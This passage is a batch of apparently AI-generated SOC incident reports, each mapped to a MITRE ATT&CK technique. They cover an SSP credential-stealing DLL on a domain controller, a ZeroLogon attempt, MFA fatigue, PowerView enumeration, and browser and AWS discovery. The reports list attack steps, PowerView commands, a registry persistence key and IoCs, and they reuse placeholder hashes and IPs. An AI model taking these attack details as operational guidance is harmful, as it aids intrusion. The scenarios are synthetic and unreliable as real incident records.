15:00 – Attacker compromises domain admin account via phishing
15:30 – Attacker logs into DC-01 using compromised credentials
15:45 – Attacker downloads malicious winlogon.dll
16:00 – Attacker replaces legitimate winlogon.dll with malicious version
16:05 – Attacker adds registry key for SSP (Security Support Provider)
16:10 – LSASS loads malicious DLL automatically
16:10-16:25 – Malicious DLL captures credentials from 78 logon attempts
16:25 – CrowdStrike detects anomaly
16:30 – Alert triggers
Malicious DLL Analysis:
File: winlogon.dll (SHA256: a1b2c3d4…)
Technique: Security Support Provider (SSP) hijacking
Function: Intercepts all authentication attempts (logons, password changes)
Capabilities:
Captures plaintext passwords
Logs to file: C:\Windows\Temp~df78e.tmp
Exfiltrates every 5 minutes to 185.143.221[.]89:443
Credentials Compromised:
78 user logons captured (including 12 domain admins)
3 password changes captured (including 1 admin)
All captured credentials exfiltrated before detection
Attacker Access:
Full control of domain controller
All domain credentials potentially compromised
3. Investigation Findings:
Timeline:
15:00 – Admin account compromised
15:30-16:10 – SSP installed
16:10-16:25 – Credential capture
16:25 – Detection
16:30 – Alert
16:32 – DC isolated
16:35 – DLL removed
16:45 – DC rebooted
17:00 – Domain-wide password reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\winlogon.dll (SHA256: a1b2c3d4…)
– C:\Windows\Temp\~df78e.tmp (captured credentials)
Registry:
– HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages (winlogon added)
Network:
– Exfiltration IP: 185.143.221[.]89:443
Accounts:
– Compromised admin account (disabled)
4. Containment Actions:
Immediate Actions:
Isolated DC-01 from network.
Removed malicious winlogon.dll.
Restored original DLL from backup.
Rebooted DC-01.
Removed registry SSP entry.
Domain-Wide Actions:
Forced password reset for ALL domain users (3,200+).
Reset krbtgt password (twice).
Reset all service account passwords.
Revoked all certificates.
Credential Monitoring:
Monitored for any suspicious logins using stolen credentials (none found).
Blocked exfiltration IP at firewall.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin accounts.
Admin allowed to log directly into DC (should be PAW).
No application control on DC.
6. Business Impact:
Operational Impact: Domain-wide password reset, 4 hours of disruption.
Security Impact: All domain credentials potentially compromised; full reset required.
Financial Impact: Significant (incident response, password reset costs).
7. Remediation & Prevention:
Completed Actions:
Malicious DLL removed.
DC cleaned.
All passwords reset.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Access Workstations (PAWs).
Blocked direct admin logins to DCs.
Enabled application control on DCs (CrowdStrike Falcon Prevent).
Monitored LSASS for any unauthorized DLL loads.
8. Conclusion:
An attacker compromised a domain admin, installed a malicious SSP on the domain controller, and captured 78 user credentials before detection. CrowdStrike detected the anomalous DLL in LSASS, enabling rapid containment. All domain passwords were reset.
Closure Rationale: DC cleaned; all passwords reset; admin controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 18:00 EST
75. T1212 – Exploitation for Credential Access (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-EXPLOIT-1212-7842 Alert Time: 2024-02-22 10:30:15 EST Severity: CRITICAL (95/100) Source: Microsoft Defender for Identity Rule: “Suspicious ZéroLogon Attempt Detected (CVE-2020-1472)” MITRE ATT&CK: T1212 – Exploitation for Credential Access
Alert Details:
Detection: Possible ZéroLogon exploit attempt against domain controller
Target: DC-02 (Secondary Domain Controller) Time: 10:25 EST
Exploit Details:
Vulnerability: CVE-2020-1472 (ZéroLogon)
CVSS Score: 10.0 (Critical)
Affected Protocol: Netlogon (MS-NRPC)
Exploit Attempts: 2,500+ in 2 minutes
Netlogon Anomalies:
Multiple Netlogon requests with zeroed computer account credentials
Requests for computer account: DC-02$ (domain controller account)
Attempts to reset computer account password
Pattern matches ZéroLogon exploit (privilege escalation to domain admin)
Detection Logic:
2,500+ Netlogon requests in short time (anomalous)
All requests use zeroed credentials (exploit signature)
Targeting domain controller computer account
Attempts to change password without authentication
Additional Context:
ZéroLogon allows attacker to gain domain admin privileges
Exploit targets Netlogon protocol
Successful exploitation gives attacker control of domain
Patch available (August 2020) – host may be unpatched
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed ZéroLogon exploit attempts
2. Immediate Action
Block attacker IP
Firewall, Network ACLs
Attacker IP 185.143.221[.]89 blocked
3. Patch Verification
Check if DC-02 is patched
SCCM, Windows Update
DC-02 MISSING critical patch (CVE-2020-1472)
4. Apply Patch
Deploy emergency patch
SCCM, Windows Update
Patch applied immediately
5. Exploit Check
Verify if exploit succeeded
Event Logs, MDI
Exploit attempts detected; no success (patched)
6. Threat Hunting
Check for similar attempts
MDI, Splunk
No other exploit attempts found
Jira Incident Report
Ticket: SOC-2024-115 Summary: T1212 – ZéroLogon Exploit Attempt Against Unpatched Domain Controller Status: RESOLVED Resolution: MALICIOUS – Exploit Blocked, Patch Applied Priority: P1 – CRITICAL Labels: T1212, exploitation, credential-access, zerologon, mdi, cve-2020-1472 Components: Vulnerability-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious ZéroLogon Attempt Detected (CVE-2020-1472)”.
Target: DC-02 (Secondary Domain Controller).
Attacker IP: 185.143.221[.]89.
Time: 2024-02-22 10:30 EST.
Technique: MITRE ATT&CK T1212 – Exploitation for Credential Access.
2. Technical Analysis:
Exploit Details:
Vulnerability: CVE-2020-1472 (ZéroLogon)
CVSS: 10.0 (Critical)
Affected: Netlogon protocol (MS-NRPC)
Impact: Attacker can become domain admin without credentials
Attack Attempt:
10:25-10:27 – 2,500+ Netlogon requests from 185.143.221[.]89
Requests targeted DC-02$ computer account
All requests used zeroed credentials (exploit signature)
Attempts to reset computer account password
Pattern: Standard ZéroLogon exploitation
System Status:
DC-02 was MISSING patch KB4565349 (August 2020)
Vulnerability present for 3.5 years
Exploit would have succeeded if not detected
Exploit Success Criteria:
Attacker needs to send 2,500+ requests (probability of success increases)
After ~2,500 attempts, password reset succeeds
Attacker can then use computer account to authenticate as domain admin
3. Investigation Findings:
Timeline:
10:25 – Exploit attempts begin
10:27 – 2,500+ attempts completed
10:27 – MDI detects anomalous pattern
10:30 – Alert triggers
10:32 – SOC investigates
10:33 – Attacker IP blocked
10:35 – Patch verification (found missing)
10:40 – Emergency patch applied
10:45 – System rebooted
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– Protocol: Netlogon (MS-NRPC)
– Pattern: 2,500+ requests with zeroed credentials
Vulnerability:
– CVE-2020-1472 (unpatched until 10:40)
4. Containment Actions:
Immediate Actions:
Blocked attacker IP at firewall.
Isolated DC-02 temporarily.
Verified exploit did not succeed (event logs).
Patch Remediation:
Applied KB4565349 (emergency patch).
Rebooted DC-02.
Verified patch installed.
Enterprise-Wide Actions:
Scanned all domain controllers for missing patch.
Found 2 additional DCs missing patch (applied).
Verified all domain controllers patched.
5. Root Cause Analysis:
Primary Cause: Missing critical security patch (3.5 years unpatched).
Contributing Factors:
Patch management failure (missed critical updates).
No vulnerability scanning for domain controllers.
No network segmentation limiting Netlogon access.
6. Business Impact:
Operational Impact: DC-02 offline for 30 minutes for patching.
Security Impact: Exploit detected and blocked before success.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Patch applied.
Attacker blocked.
Other DCs verified.
Technical Controls Enhanced:
Implemented mandatory patch compliance for all DCs.
Deployed vulnerability scanning (Qualys) for all critical systems.
Enabled Netlogon security fixes (enforce secure RPC).
Created alert for any ZéroLogon attempt.
8. Conclusion:
An attacker attempted to exploit the ZéroLogon vulnerability against an unpatched domain controller. MDI detected the exploit pattern and triggered an alert. The attacker was blocked before the exploit could succeed, and the missing patch was applied.
Closure Rationale: Patch applied; exploit blocked; attacker IP blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 11:30 EST
End of Batch 15
Ready for your next batch of prompts whenever you are.
Batch 16: Discovery & Credential Access Incident Reports
Here are the next 5 detailed SOC incident reports.
76. T1621 – MFA Request Generation (Okta Detection)
Okta Alert Details
Alert ID: OKTA-MFA-BOMB-1621-7842 Alert Time: 2024-02-23 09:30:22 EST Severity: HIGH (88/100) Source: Okta Identity Cloud Rule: “Multiple MFA Push Requests – Potential MFA Fatigue Attack” MITRE ATT&CK: T1621 – Multi-Factor Authentication Request Generation
Alert Details:
Detection: User received multiple MFA push notifications in short time window
User: cjohnson@company.com (CEO) Application: Okta Verify (MFA) Time Window: 09:15 – 09:30 EST
Event Details:
09:15:32 – Login attempt from IP 45.134.225[.]78 (Russia)
09:15:33 – MFA push sent to user’s device (DENIED – user declined)
09:16:45 – Login attempt from IP 185.143.221[.]89 (Bulgaria)
09:16:46 – MFA push sent (DENIED – user declined)
09:18:12 – Login attempt from IP 194.165.16[.]89 (Romania)
09:18:13 – MFA push sent (DENIED)
09:20:05 – Login attempt from IP 45.134.225[.]78 (Russia)
09:20:06 – MFA push sent (DENIED)
… (continues every 2-3 minutes)
Total MFA Requests: 24 in 15 minutes
23 DENIED by user
1 APPROVED at 09:28:45 (user accepted after multiple requests)
Successful Login:
Time: 09:28:45
Source IP: 45.134.225[.]78 (Russia)
User Agent: Chrome 121 on Windows
Session Duration: 8 minutes (until detection)
Detection Logic:
24 MFA requests in 15 minutes (highly anomalous)
User normally receives 1-2 MFA requests per day
Multiple source IPs across different countries
Pattern matches “MFA fatigue” or “MFA bombing” attack
Additional Context:
CEO cjohnson is high-value target
User reported “annoying MFA notifications” at 09:20
User accidentally approved one request at 09:28
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Okta alert
Okta Admin Console
Confirmed MFA fatigue attack
2. Immediate Action
Terminate active session
Okta Admin
Session terminated
3. User Account
Temporarily disable account
Okta, Azure AD
Account disabled
4. User Contact
Call CEO immediately
Phone
User confirmed accidental approval
5. Password Reset
Force password reset
Okta, Azure AD
Password reset; MFA re-enrolled
6. IP Blocking
Block attacker IPs
Okta, Firewall
All 3 IPs blocked
Jira Incident Report
Ticket: SOC-2024-116 Summary: T1621 – MFA Fatigue Attack Compromises CEO Account Status: RESOLVED Resolution: MALICIOUS – Session Terminated Priority: P1 – CRITICAL Labels: T1621, mfa-fatigue, mfa-bombing, okta, executive-targeting Components: Identity-Management, Executive-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Okta Identity Cloud.
Alert: “Multiple MFA Push Requests – Potential MFA Fatigue Attack”.
User: cjohnson@company.com (CEO).
Time: 2024-02-23 09:30 EST.
Technique: MITRE ATT&CK T1621 – Multi-Factor Authentication Request Generation.
2. Technical Analysis:
Attack Chain:
09:15 – Attacker obtains CEO’s password (via prior phishing)
09:15-09:28 – Attacker repeatedly attempts login with password
Each attempt triggers MFA push to CEO’s phone
09:15-09:27 – User declines 23 requests (annoyed)
09:28 – User accidentally approves request (MFA fatigue)
09:28-09:36 – Attacker has active session
09:30 – Okta detects anomalous pattern
Attacker IPs:
45.134.225[.]78 (Russia) – primary
185.143.221[.]89 (Bulgaria) – secondary
194.165.16[.]89 (Romania) – tertiary
Attacker Activity During Session (8 minutes):
Accessed email (Outlook Web Access)
Viewed 3 emails (board meeting minutes)
Attempted to reset passwords for 2 other executives (blocked – required additional auth)
Downloaded 1 attachment (financial summary)
No data exfiltration beyond attachment
User Behavior:
User reported “annoying notifications” to assistant
Accidentally approved while trying to dismiss
Did not realize approval was for attacker
3. Investigation Findings:
Timeline:
09:15-09:28 – MFA bombing
09:28 – Accidental approval
09:28-09:36 – Attacker access
09:30 – Alert triggers
09:32 – SOC investigates
09:34 – Session terminated
09:35 – Account disabled
09:36 – CEO contacted
Indicators of Compromise (IoCs):
Network:
– Attacker IPs: 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89
Session:
– Okta session ID: 78a9b2c3-d4e5-f6a7-b8c9-d0e1f2a3b4c5 (terminated)
Data:
– Financial summary (attachment) potentially accessed
4. Containment Actions:
Immediate Actions:
Terminated active Okta session.
Disabled CEO account temporarily.
Reset CEO password.
Re-enrolled MFA (new device registration).
Blocked all 3 attacker IPs at Okta and firewall.
Data Protection:
Reviewed accessed emails and attachment.
Attachment contained non-public financial data (Q1 projections).
No evidence of further distribution.
User Education:
CEO briefed on MFA fatigue attacks.
Instructed to never approve unexpected MFA requests.
5. Root Cause Analysis:
Primary Cause: User fatigue led to accidental approval of malicious MFA request.
Contributing Factors:
Password compromised via prior phishing.
No number matching in MFA (just approve/deny).
No rate limiting on MFA requests.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Data Exposure: Q1 financial projections viewed; not public.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Session terminated.
Password reset.
MFA re-enrolled.
IPs blocked.
Technical Controls Enhanced:
Enabled number matching in Okta Verify (user must enter number from screen).
Implemented rate limiting for MFA requests (max 5 per 15 minutes).
Added alerting for excessive MFA denials.
Enforced Conditional Access policies requiring trusted locations for executives.
8. Conclusion:
An attacker used an MFA fatigue attack against the CEO, sending 24 push notifications until the user accidentally approved one. The attacker accessed email and viewed a financial document before detection. Okta’s anomaly detection triggered within minutes, terminating the session.
Closure Rationale: Session terminated; account secured; MFA number matching enabled.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 10:30 EST
77. T1087 – Account Discovery (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-ACCT-DISCOVERY-1087-7842 Alert Time: 2024-02-23 14:15:33 EST Severity: MEDIUM (72/100) Source: Microsoft Defender for Identity Rule: “Suspicious Account Enumeration via SAMR” MITRE ATT&CK: T1087.002 – Account Discovery: Domain Account
Alert Details:
Detection: Multiple SAMR (Security Account Manager Remote) queries from single host
Source Host: ENG-WS-045 (Engineering Workstation) User: rpatel@company.com (Raj Patel, Engineer) Time: 14:10-14:15 EST
SAMR Queries:
14:10:15 – SamrEnumerateDomainsInSamServer (enumerate domains)
14:10:30 – SamrLookupDomainInSamServer (get domain SID)
14:10:45 – SamrOpenDomain (open domain handle)
14:11:00 – SamrEnumerateUsersInDomain (list all users) – 3,247 users enumerated
14:11:30 – SamrEnumerateGroupsInDomain (list all groups)
14:12:00 – SamrQueryInformationUser (detailed info for specific users)
14:12:30 – SamrQueryInformationGroup (detailed info for admin groups)
Targeted Accounts:
Domain Admins group – queried
Enterprise Admins group – queried
krbtgt account – queried
All users with “admin” in name – queried
Service accounts – queried
Detection Logic:
3,247 user accounts enumerated (high volume)
Process: powershell.exe (using ADSI or .NET)
Parent: cmd.exe launched by user rpatel
User normally does not perform account discovery
Pattern matches adversary reconnaissance
Additional Context:
User rpatel had previous security incidents
No legitimate business need for domain-wide enumeration
Queries performed via PowerShell (unusual for this user)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed domain account enumeration
2. Process Investigation
Identify PowerShell script
CrowdStrike Falcon
Found PowerView script (Active Directory reconnaissance tool)
3. User Interview
Contact rpatel
Teams, Phone
User claims “researching security” – unauthorized
4. Tool Removal
Delete PowerView script
CrowdStrike Live Response
Script removed from Downloads folder
5. User Remediation
User counseling
Manager, HR
Policy violation documented
6. Threat Hunting
Check for other enumeration
MDI, Splunk
No other hosts with same activity
Jira Incident Report
Ticket: SOC-2024-117 Summary: T1087 – Domain Account Discovery via PowerView Status: RESOLVED Resolution: POLICY VIOLATION – Unauthorized Reconnaissance Priority: P3 – LOW Labels: T1087, account-discovery, powerview, mdi, policy-violation Components: Identity-Monitoring, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Account Enumeration via SAMR”.
Source Host: ENG-WS-045 (Engineering Department, user rpatel).
Time: 2024-02-23 14:15 EST.
Technique: MITRE ATT&CK T1087.002 – Account Discovery: Domain Account.
2. Technical Analysis:
Enumeration Details:
Tool: PowerView.ps1 (Active Directory reconnaissance script)
Commands Executed:
Get-NetUser – enumerated all 3,247 domain users
Get-NetGroup – enumerated all domain groups
Get-NetGroupMember -GroupName “Domain Admins” – listed all domain admins
Get-NetUser -Username *admin* – searched for admin accounts
Get-NetComputer – listed all domain computers
Scope of Enumeration:
All domain users (3,247 accounts)
All domain groups (487 groups)
Domain Admins group (12 members)
Enterprise Admins group (5 members)
Service accounts (234 accounts)
Domain controllers (4)
File servers (23)
User Intent:
User claimed “researching security for a presentation”
No malicious intent identified
No data exfiltration
No unauthorized access attempted
Policy Violation:
No authorization for security testing
PowerView is penetration testing tool
Domain enumeration violates acceptable use policy
3. Investigation Findings:
Timeline:
14:10-14:15 – Enumeration performed
14:15 – MDI alert
14:17 – SOC investigates
14:20 – User contacted
14:25 – PowerView script identified and removed
14:30 – User interview complete
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Downloads\PowerView.ps1 (SHA256: a1b2c3d4…)
Commands:
– Get-NetUser, Get-NetGroup, Get-NetGroupMember
Process:
– powershell.exe executing PowerView functions
4. Containment Actions:
Immediate Actions:
Removed PowerView script from Downloads folder.
Cleared PowerShell history.
No isolation needed (non-malicious activity).
User Remediation:
User counseled on policy violation.
Required to complete security awareness training.
Documentation sent to manager for review.
Monitoring:
Enhanced monitoring for this user’s account.
No further suspicious activity observed.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed unauthorized reconnaissance tool.
Contributing Factors:
No application control blocking PowerView.
User unaware of policy against domain enumeration.
Curiosity about security without authorization.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (information already accessible to user).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
Tool removed.
User educated.
Policy documented.
Technical Controls Enhanced:
Created alert for PowerView script execution.
Enhanced monitoring for SAMR enumeration.
Deployed application control to block unauthorized reconnaissance tools.
8. Conclusion:
An engineer downloaded and executed PowerView, performing extensive domain account discovery without authorization. MDI detected the anomalous SAMR queries, enabling identification and removal of the tool. The activity was a policy violation, not malicious.
Closure Rationale: Tool removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 15:30 EST
78. T1010 – Application Window Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-APP-DISCOVERY-1010-7842 Alert Time: 2024-02-23 11:30:22 EST Severity: MEDIUM (65/100) Source: CrowdStrike Falcon EDR Rule: “Suspicious Window Enumeration – Potential Credential Theft Prep” MITRE ATT&CK: T1010 – Application Window Discovery
Alert Details:
Detection: Process enumerating open windows/titles, potentially for credential theft
Host: FIN-WS-078 (Finance Workstation) User: bturner (Brian Turner, Accountant) Time: 11:25 EST
Process Details:
Process: C:\Temp\windows_enum.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner (standard user)
API Calls:
EnumWindows (enumerate all top-level windows) – 47 windows found
GetWindowText (get titles of each window) – 47 calls
GetWindowThreadProcessId (get process ID for each window)
FindWindow (search for specific window titles)
Windows/Titles Enumerated:
“QuickBooks Enterprise” – accounting software
“Microsoft Excel – Q1_Financials.xlsx” – spreadsheet
“Internet Explorer – Online Banking” – banking portal
“Outlook – Invoice” – email
“Remote Desktop Connection” – RDP session
42 additional window titles
Detection Logic:
Process enumerating all open windows (unusual for legitimate software)
Looking for financial/banking applications (targeted)
Parent process from Temp folder (suspicious)
Pattern matches credential theft preparation (form grabbing)
Additional Context:
User bturner handles financial data
Process downloaded 5 minutes prior
Similar tools used for “form grabbing” attacks
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed window enumeration tool
2. Process Analysis
Analyze windows_enum.exe
CrowdStrike Sandbox
Tool captures screenshots of financial applications
3. Immediate Action
Terminate process
CrowdStrike
Process killed
4. File Deletion
Delete windows_enum.exe
CrowdStrike Live Response
File removed
5. User Interview
Contact bturner
Teams, Phone
User downloaded “productivity tool” from email
6. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; sender blocked
Jira Incident Report
Ticket: SOC-2024-118 Summary: T1010 – Application Window Discovery Tool Targeting Financial Data Status: RESOLVED Resolution: MALICIOUS – Tool Removed Priority: P2 – MEDIUM Labels: T1010, app-discovery, window-enumeration, credential-theft, crowdstrike Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Window Enumeration – Potential Credential Theft Prep”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Temp\windows_enum.exe.
Time: 2024-02-23 11:30 EST.
Technique: MITRE ATT&CK T1010 – Application Window Discovery.
2. Technical Analysis:
Attack Chain:
11:15 – User receives email from “productivity@tools[.]net”
11:16 – Email contains link to “Window Manager Pro”
11:17 – User downloads windows_enum.exe
11:18 – User executes file
11:19-11:24 – Tool enumerates windows, captures screenshots
11:25 – CrowdStrike detects
11:26 – SOC investigates
Tool Analysis:
Name: windows_enum.exe (masquerading as productivity tool)
SHA256: a1b2c3d4…
Capabilities:
Enumerates all open windows
Captures screenshots of financial applications
Logs window titles and process IDs to file
Attempts to send data to C2 (blocked)
Windows/Titles of Interest:
QuickBooks Enterprise (accounting data)
Excel with Q1_Financials.xlsx (financial data)
Internet Explorer – Online Banking (banking credentials)
Remote Desktop Connection (potential lateral movement)
Data Captured:
47 window titles logged
3 screenshots captured (QuickBooks, Excel, Banking)
No exfiltration before detection (C2 blocked)
3. Investigation Findings:
Timeline:
11:15 – Email received
11:17 – Tool downloaded
11:18 – Tool executed
11:19-11:24 – Enumeration
11:25 – Alert triggers
11:26 – Process terminated
11:27 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Temp\windows_enum.exe (SHA256: a1b2c3d4…)
– C:\Temp\~windows.log (enumeration log)
– C:\Temp\~screenshot*.png (3 screenshots)
Network:
– C2 attempt (blocked)
Email:
– Sender: productivity@tools[.]net
– Subject: “Increase Your Productivity with Window Manager Pro”
4. Containment Actions:
Immediate Actions:
Terminated windows_enum.exe.
Deleted executable and generated files.
Isolated host temporarily.
Blocked sender domain at email gateway.
Data Review:
Reviewed captured data (no sensitive customer info).
Verified no exfiltration occurred.
User Remediation:
User counseled on downloading untrusted software.
Password reset as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted “productivity tool”.
Contributing Factors:
No application control blocking unknown executables.
User unaware of credential theft risks.
Email filtering allowed malicious link.
6. Business Impact:
Operational Impact: Finance user offline for 1 hour.
Data Exposure: 3 screenshots of financial data captured but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
Email blocked.
Technical Controls Enhanced:
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for window enumeration API calls.
Enhanced email filtering for productivity tool lures.
8. Conclusion:
A user downloaded a malicious tool masquerading as a productivity application. The tool enumerated open windows and captured screenshots of financial data. CrowdStrike detected the suspicious behavior and terminated the process before exfiltration.
Closure Rationale: Malicious tool removed; data contained; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 12:30 EST
79. T1217 – Browser Bookmark Discovery (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-BOOKMARK-DISCOVERY-1217-7842 Alert Time: 2024-02-23 16:30:45 EST Severity: MEDIUM (68/100) Source: Microsoft Defender for Endpoint Rule: “Browser Bookmark Access – Potential Reconnaissance” MITRE ATT&CK: T1217 – Browser Bookmark Discovery
Alert Details:
Detection: Process accessing browser bookmark files
Host: MKT-WS-112 (Marketing Workstation) User: sjones (Sarah Jones, Marketing Manager) Time: 16:25 EST
File Access Events:
16:25:10 – Process accessed: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
16:25:15 – Process accessed: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak
16:25:20 – Process accessed: C:\Users\sjones\AppData\Roaming\Mozilla\Firefox\Profiles*.default\places.sqlite
16:25:25 – Process accessed: C:\Users\sjones\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks
Process Details:
Process: C:\Temp\bookmark_viewer.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: sjones
Bookmark Categories Found:
“Corporate Banking” – 3 bookmarks
“VPN Access” – 2 bookmarks
“Internal Portals” – 5 bookmarks
“Cloud Services” – 8 bookmarks
“Vendor Portals” – 12 bookmarks
Total bookmarks: 147
Detection Logic:
Process accessing browser bookmark files (unusual)
Bookmarks contain sensitive/internal URLs
Process from Temp folder (suspicious)
Pattern matches reconnaissance for targeted attacks
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed bookmark access
2. Process Analysis
Analyze bookmark_viewer.exe
Defender Sandbox
Tool extracts and categorizes bookmarks
3. Immediate Action
Terminate process
Defender
Process killed
4. File Deletion
Delete bookmark_viewer.exe
Defender
File removed
5. User Interview
Contact sjones
Teams, Phone
User downloaded “bookmark manager” tool
6. Data Check
Verify exfiltration
Firewall Logs, DLP
No exfiltration detected
Jira Incident Report
Ticket: SOC-2024-119 Summary: T1217 – Browser Bookmark Discovery Tool Executed Status: RESOLVED Resolution: MALICIOUS – Tool Removed Priority: P3 – LOW Labels: T1217, bookmark-discovery, reconnaissance, defender, marketing Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Browser Bookmark Access – Potential Reconnaissance”.
Host: MKT-WS-112 (Marketing Department, user sjones).
Process: C:\Temp\bookmark_viewer.exe.
Time: 2024-02-23 16:30 EST.
Technique: MITRE ATT&CK T1217 – Browser Bookmark Discovery.
2. Technical Analysis:
Attack Chain:
16:15 – User searches for “bookmark manager tool”
16:16 – Downloads bookmark_viewer.exe from freeware site
16:17 – Executes tool
16:18-16:25 – Tool accesses Chrome, Firefox, Edge bookmarks
16:25 – Defender detects
16:26 – SOC investigates
Tool Analysis:
Name: bookmark_viewer.exe (legitimate bookmark manager, potentially abused)
SHA256: a1b2c3d4…
Capabilities:
Reads bookmarks from all major browsers
Categorizes bookmarks by folder
Exports to HTML/CSV
Attempts to phone home (blocked)
Bookmarks Discovered:
Internal Portals: Confluence, Jira, HR system, IT helpdesk, VPN
Cloud Services: Office 365, AWS, Azure, GCP, Salesforce
Vendor Portals: 12 different vendor login pages
Banking: Corporate banking, expense reporting
Total: 147 bookmarks with corporate/login information
Exfiltration Attempt:
Tool attempted to POST bookmark data to 185.143.221[.]89:8080
Connection blocked by firewall
No data exfiltrated
3. Investigation Findings:
Timeline:
16:15 – Tool downloaded
16:17 – Tool executed
16:18-16:25 – Bookmarks accessed
16:25 – Defender alert
16:26 – Process terminated
16:27 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Temp\bookmark_viewer.exe (SHA256: a1b2c3d4…)
– C:\Temp\bookmarks_export.html (partial)
Network:
– C2 attempt: 185.143.221[.]89:8080 (blocked)
4. Containment Actions:
Immediate Actions:
Terminated bookmark_viewer.exe.
Deleted executable and export file.
Blocked C2 IP at firewall.
Data Review:
Verified no exfiltration occurred.
Bookmarks unchanged.
User Remediation:
User counseled on downloading freeware.
Advised to use corporate-approved tools only.
5. Root Cause Analysis:
Primary Cause: User downloaded untrusted bookmark manager tool.
Contributing Factors:
No application control blocking unknown executables.
User unaware of risks of freeware tools.
6. Business Impact:
Operational Impact: None.
Data Exposure: Bookmark data accessed locally but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created alert for bookmark file access by non-browser processes.
Enhanced application control policies.
Added bookmark exfiltration attempt to monitoring.
8. Conclusion:
A user downloaded a bookmark manager tool that accessed browser bookmarks containing internal and sensitive URLs. The tool attempted to exfiltrate the data, but was blocked. Defender detected the bookmark access and terminated the process.
Closure Rationale: Tool removed; data contained; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 17:30 EST
80. T1580 – Cloud Infrastructure Discovery (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-CLOUD-DISCOVERY-1580-7842 Alert Time: 2024-02-23 10:30:22 EST Severity: HIGH (85/100) Source: AWS GuardDuty Rule: “Unauthorized API Calls – Cloud Infrastructure Discovery” MITRE ATT&CK: T1580 – Cloud Infrastructure Discovery
Alert Details:
Detection: Multiple Describe/List API calls from unusual source
AWS Account: 123456789012 (Production) IAM User: svc_ci_cd (CI/CD Service Account) Source IP: 185.143.221[.]89 (Bulgaria) Time: 10:15-10:30 EST
API Calls:
10:15:22 – ec2:DescribeInstances (list all EC2 instances)
10:15:45 – ec2:DescribeSecurityGroups (list all security groups)
10:16:12 – ec2:DescribeVpcs (list all VPCs)
10:16:38 – ec2:DescribeSubnets (list all subnets)
10:17:05 – ec2:DescribeRouteTables (list all route tables)
10:17:33 – ec2:DescribeInternetGateways (list IGWs)
10:18:01 – s3:ListBuckets (list all S3 buckets)
10:18:28 – s3:GetBucketLocation (for each bucket)
10:19:15 – rds:DescribeDBInstances (list all RDS instances)
10:19:45 – lambda:ListFunctions (list all Lambda functions)
10:20:12 – iam:ListUsers (list all IAM users)
10:20:38 – iam:ListRoles (list all IAM roles)
… (total 87 API calls)
Detection Logic:
Source IP outside expected region (Bulgaria, not US)
User svc_ci_cd normally only used from US
API calls are discovery-focused (Describe/List)
Volume of calls (87 in 15 minutes) exceeds normal
No write/modify operations (consistent with discovery)
Additional Context:
svc_ci_cd has read-only permissions (by design)
Credentials may be compromised
Discovery phase before potential attack
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
AWS GuardDuty Console
